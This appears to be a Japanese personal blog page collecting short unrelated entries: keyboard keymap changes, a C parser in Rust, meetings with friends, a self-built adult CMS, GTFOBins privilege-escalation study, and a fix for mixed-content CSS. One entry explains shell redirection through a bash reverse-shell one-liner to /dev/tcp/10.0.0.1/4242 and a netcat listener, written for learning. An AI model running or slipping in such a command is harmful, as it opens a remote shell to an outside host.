• QMKでキーマップ弄った
  • updated ergodox_ez/kza keymap · lambd433/qmk_firmware@199c10a
  • 今こういうのがあるらしい。初めからの差分を記録したいから使わないけども。
    • Oryx: The ZSA Keyboard Configurator
  • Rust書き始めたので、これ関係でCのパーサを書いてる
    • ちなみにCのBNFはこれらしい
      • The syntax of C in Backus-Naur form
• 旧友に会う（秋葉原編）。偶然に5年ぶりくらい
• 旧友に会う（池袋編）。5年ぶりくらい。女がゲームに向き合う姿勢の傾向性について
  • 本と珈琲 梟書茶房 [FUKUROSHOSABO]
  • ホーム | ボードゲームカフェ ONE
    • 持ち込みでBorder States | Board Game | BoardGameGeekと借りたTorres | Board Game | BoardGameGeekやった。
• NuitterというPCMS(Porn CMS)をFlaskで書いて個人的に運用し始めた。20年前からやっておけばよかった

ターゲットのシェルを奪取できたら一番何をしたいかというと root を奪取したい。 この権限昇格について TryHackMe や HackTheBox をやっているのだが、テクニックが多く難しい。 この文脈上で、設定ミスを利用するテクニック集GTFOBinsがあり、 印象深かったものをまとめておく。一目でやばそうなものもあれば、予想外のものもあり楽しい。

色々なリダイレクトを理解しようという試みである。

Reverse Shell のコマンドについて

スクリプトの作成

これがどのような意味を持つのかは今は一切考えず、 標準出力に 1, 標準エラー出力に 2 という文字列を出力するスクリプトを作成しておこう。

$ echo "echo 1 >&1" > redir
$ echo "echo 2 >&2" >> redir
$ chmod +x redir

脅威アクターは目的達成のために、ターゲットのシェルを奪う。
シェルを奪えれば、ターゲットのコントロールが格段に容易になる。
奪い方に色んな方法があるが、そのテクニックの一つに Reverse Shell があり、シェルを奪う普遍的な手法になっている。
これの良い点は、ターゲットからアクターの端末へ接続させるため、アクターからターゲットに直接アクセスできなくてもよいことだ。

攻撃側のシェルで接続を待機させる。典型例がこれだ。

$ nc -lnvp 4242

そして、ターゲットのシェルでなんとか以下を実行させられたら勝ち。外部へ入出力できるようになる。

$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

ペイロードの生成ツールやチートシートなしで入力するとなると結構難しいのではないかと思う。
シェルに詳しくなるためにも今回はこのコマンドを理解していきたい。

• 問題: HTTPS でアクセスした場合、CSS が適用されない。
• 原因: Chrome に Mixed Contents 判定されて静的ファイルが読み込めていなかった。

Mixed Contents とは HTTPS で読み込むコンテンツに HTTP で読み込むサブコンテンツが含まれている セキュリティ上の問題を指す。

HTTPS の Mixed Contents と決別する